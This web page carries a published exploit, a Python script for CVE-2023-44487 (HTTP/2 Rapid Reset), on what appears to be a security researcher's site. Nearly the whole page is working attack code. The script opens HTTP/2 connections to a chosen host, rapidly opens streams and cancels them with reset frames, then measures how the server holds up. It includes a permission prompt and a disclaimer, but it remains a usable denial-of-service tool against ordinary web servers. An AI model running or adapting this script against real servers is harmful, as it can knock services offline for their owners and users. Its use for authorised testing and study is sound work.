Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service #!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""

import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics

try:
import h2.connection
import h2.events
import h2.exceptions
import h2.config
except ImportError:
print("Error: h2 library not installed. Install with: pip install h2")
exit(1)

# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

class HTTP2RapidResetTester:
"""Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability."""

def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
self.host = host
self.port = port
self.use_ssl = use_ssl
self.connection = None
self.reader = None
self.writer = None
self.response_times = []
self.errors = []
self.connection_closed = False

async def connect(self) -> bool:
"""Establish HTTP/2 connection to the target server."""
try:
logger.info(f"Connecting to {self.host}:{self.port}")

if self.use_ssl:
ssl_context = ssl.create_default_context()
ssl_context.set_alpn_protocols(['h2'])
self.reader, self.writer = await asyncio.open_connection(
self.host, self.port, ssl=ssl_context
)
else:
self.reader, self.writer = await asyncio.open_connection(self.host, self.port)

# Initialize HTTP/2 connection
config = h2.config.H2Configuration(client_side=True)
self.connection = h2.connection.H2Connection(config=config)
self.connection.initiate_connection()

# Send connection preface
await self._send_data(self.connection.data_to_send())

logger.info("HTTP/2 connection established successfully")
self.connection_closed = False
return True

except Exception as e:
logger.error(f"Failed to establish connection: {e}")
return False

async def _send_data(self, data: bytes):
"""Send data to the server."""
if data and self.writer and not self.connection_closed:
try:
self.writer.write(data)
await self.writer.drain()
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while sending data: {e}")
self.connection_closed = True

async def _receive_data(self) -> bytes:
"""Receive data from the server."""
try:
if self.connection_closed or not self.reader:
return b''
data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0)
if not data:
self.connection_closed = True
return data
except asyncio.TimeoutError:
return b''
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while receiving data: {e}")
self.connection_closed = True
return b''

async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
"""
Perform the rapid reset attack test.

Args:
num_streams: Number of streams to create and reset
delay: Delay between stream creations (seconds)

Returns:
Dictionary with test results
"""
logger.info(f"Starting rapid reset test with {num_streams} streams")

start_time = time.time()
created_streams = []
reset_streams = []

try:
# Phase 1: Rapidly create streams
for i in range(num_streams):
if self.connection_closed:
logger.warning("Connection closed during stream creation")
break

stream_id = (i * 2) + 1 # Odd numbers for client-initiated streams

# Create HTTP/2 headers
headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Tester/1.0'),
]

try:
# Send headers to create stream
self.connection.send_headers(stream_id, headers)
await self._send_data(self.connection.data_to_send())
created_streams.append(stream_id)

# Small delay to avoid overwhelming the connection
if delay > 0:
await asyncio.sleep(delay)

except Exception as e:
self.errors.append(f"Error creating stream {stream_id}: {e}")
if "connection" in str(e).lower():
break

logger.info(f"Created {len(created_streams)} streams")

# Phase 2: Rapidly reset all streams
reset_start = time.time()
for stream_id in created_streams:
if self.connection_closed:
logger.warning("Connection closed during stream reset")
break

try:
# Send RST_STREAM frame to cancel the request
self.connection.reset_stream(stream_id, error_code=0x8) # CANCEL error code
await self._send_data(self.connection.data_to_send())
reset_streams.append(stream_id)

if delay > 0:
await asyncio.sleep(delay / 10) # Faster resets

except h2.exceptions.StreamClosedError:
# Stream already closed, continue
pass
except Exception as e:
self.errors.append(f"Error resetting stream {stream_id}: {e}")
if "connection" in str(e).lower():
break

reset_duration = time.time() - reset_start
total_duration = time.time() - start_time

logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")

# Phase 3: Monitor server response
await self._monitor_server_response(timeout=10.0)

return {
'streams_created': len(created_streams),
'streams_reset': len(reset_streams),
'total_duration': total_duration,
'reset_duration': reset_duration,
'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
'errors': len(self.errors),
'response_times': self.response_times.copy(),
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'connection_closed': self.connection_closed
}

except Exception as e:
logger.error(f"Error during rapid reset test: {e}")
return {'error': str(e)}

async def _monitor_server_response(self, timeout: float = 10.0):
"""Monitor server responses and measure response times."""
logger.info("Monitoring server responses...")

end_time = time.time() + timeout

while time.time() < end_time and not self.connection_closed:
try:
start = time.time()
data = await self._receive_data()
response_time = time.time() - start

if data:
self.response_times.append(response_time)

try:
# Process HTTP/2 events
events = self.connection.receive_data(data)
for event in events:
if isinstance(event, h2.events.ResponseReceived):
logger.debug(f"Response received on stream {event.stream_id}")
elif isinstance(event, h2.events.StreamReset):
logger.debug(f"Stream {event.stream_id} reset by server")
elif isinstance(event, h2.events.ConnectionTerminated):
logger.warning("Server terminated connection")
self.connection_closed = True
return
except Exception as e:
logger.debug(f"Error processing HTTP/2 events: {e}")

await asyncio.sleep(0.1)

except Exception as e:
self.errors.append(f"Error monitoring response: {e}")
break

async def baseline_test(self, num_requests: int = 10) -> dict:
"""Perform baseline test with normal HTTP/2 requests."""
logger.info(f"Performing baseline test with {num_requests} normal requests")

start_time = time.time()
successful_requests = 0

for i in range(num_requests):
if self.connection_closed:
logger.warning("Connection closed during baseline test")
break

stream_id = (i * 2) + 1

headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Baseline/1.0'),
]

try:
request_start = time.time()
self.connection.send_headers(stream_id, headers)
self.connection.end_stream(stream_id)
await self._send_data(self.connection.data_to_send())

# Wait for response
try:
data = await asyncio.wait_for(self._receive_data(), timeout=5.0)
if data:
self.response_times.append(time.time() - request_start)
successful_requests += 1
except asyncio.TimeoutError:
logger.warning(f"Timeout waiting for response to request {i+1}")

await asyncio.sleep(0.1) # Small delay between requests

except Exception as e:
logger.warning(f"Error in baseline request {i+1}: {e}")
if "connection" in str(e).lower():
break

total_duration = time.time() - start_time

return {
'total_requests': num_requests,
'successful_requests': successful_requests,
'total_duration': total_duration,
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'success_rate': successful_requests / num_requests if num_requests > 0 else 0
}

async def close(self):
"""Close the connection gracefully."""
if self.writer and not self.connection_closed:
try:
# Try to close the connection gracefully
if self.connection:
try:
# Send GOAWAY frame if possible
self.connection.close_connection()
await self._send_data(self.connection.data_to_send())
except Exception as e:
logger.debug(f"Error sending GOAWAY frame: {e}")

# Close the writer
self.writer.close()

# Wait for close with timeout to avoid hanging
try:
await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0)
except asyncio.TimeoutError:
logger.debug("Timeout waiting for connection to close")
except (ConnectionResetError, BrokenPipeError, OSError):
# Connection already closed by peer, this is expected
pass

except Exception as e:
logger.debug(f"Error during connection cleanup: {e}")
finally:
self.connection_closed = True

async def main():
parser = argparse.ArgumentParser(
description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
epilog='WARNING: Only use on systems you own or have permission to test!'
)
parser.add_argument('host', help='Target hostname')
parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
parser.add_argument('-s', '--streams', type=int, default=100,
help='Number of streams for rapid reset test (default: 100)')
parser.add_argument('-d', '--delay', type=float, default=0.001,
help='Delay between stream operations (default: 0.001s)')
parser.add_argument('--baseline-only', action='store_true',
help='Only perform baseline test')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')

args = parser.parse_args()

if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)

print("=" * 60)
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("=" * 60)
print(f"Target: {args.host}:{args.port}")
print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
print()

# Legal disclaimer
print("LEGAL DISCLAIMER:")
print("This tool is for authorized security testing only.")
print("Ensure you have permission to test the target system.")
print("Unauthorized use may be illegal.")
print()

response = input("Do you have permission to test this system? (yes/no): ")
if response.lower() != 'yes':
print("Exiting. Only use this tool on systems you're authorized to test.")
return

tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)

try:
# Connect to target
if not await tester.connect():
logger.error("Failed to establish connection. Exiting.")
return

# Perform baseline test
print("\n" + "="*40)
print("BASELINE TEST")
print("="*40)
baseline_results = await tester.baseline_test()

print(f"Baseline Results:")
print(f" Total Requests: {baseline_results['total_requests']}")
print(f" Successful: {baseline_results['successful_requests']}")
print(f" Success Rate: {baseline_results['success_rate']:.2%}")
print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
print(f" Total Duration: {baseline_results['total_duration']:.3f}s")

if not args.baseline_only:
# Reset connection for rapid reset test
await tester.close()
tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)

if not await tester.connect():
logger.error("Failed to re-establish connection for rapid reset test.")
return

# Perform rapid reset test
print("\n" + "="*40)
print("RAPID RESET TEST (CVE-2023-44487)")
print("="*40)
print(f"Testing with {args.streams} streams...")

rapid_results = await tester.rapid_reset_test(args.streams, args.delay)

if 'error' in rapid_results:
print(f"Test failed: {rapid_results['error']}")
else:
print(f"Rapid Reset Results:")
print(f" Streams Created: {rapid_results['streams_created']}")
print(f" Streams Reset: {rapid_results['streams_reset']}")
print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
print(f" Total Duration: {rapid_results['total_duration']:.3f}s")
print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s")
print(f" Errors: {rapid_results['errors']}")
print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s")

if rapid_results.get('connection_closed'):
print(f" Connection Status: Server closed connection during test")

# Analysis
print("\n" + "="*40)
print("VULNERABILITY ANALYSIS")
print("="*40)

if rapid_results.get('connection_closed'):
print("Server closed connection during rapid reset test")
print(" This could indicate protective measures or resource exhaustion.")

if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
print("WARNING: Server may have rejected many reset requests")
print(" This could indicate protective measures are in place.")

if rapid_results['reset_rate'] > 1000:
print("HIGH RISK: Server accepts very high reset rates")
print(" This may indicate vulnerability to CVE-2023-44487")

elif rapid_results['reset_rate'] > 100:
print("MEDIUM RISK: Server accepts moderate reset rates")
print(" Further testing may be needed")

else:
print("LOWER RISK: Server has rate limiting on resets")
print(" This suggests some protection against the vulnerability")

if len(tester.errors) > rapid_results['streams_created'] * 0.1:
print("Many errors occurred during testing")
print(" Results may not be reliable")

except KeyboardInterrupt:
print("\nTest interrupted by user")
except Exception as e:
logger.error(f"Unexpected error: {e}")
finally:
try:
await tester.close()
except Exception as e:
logger.debug(f"Error during final cleanup: {e}")
print("\nTest completed.")

if __name__ == "__main__":
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("Requires: pip install h2")
print()

try:
asyncio.run(main())
except KeyboardInterrupt:
print("\nExiting...")
except Exception as e:
logger.error(f"Fatal error: {e}")

Social Media Share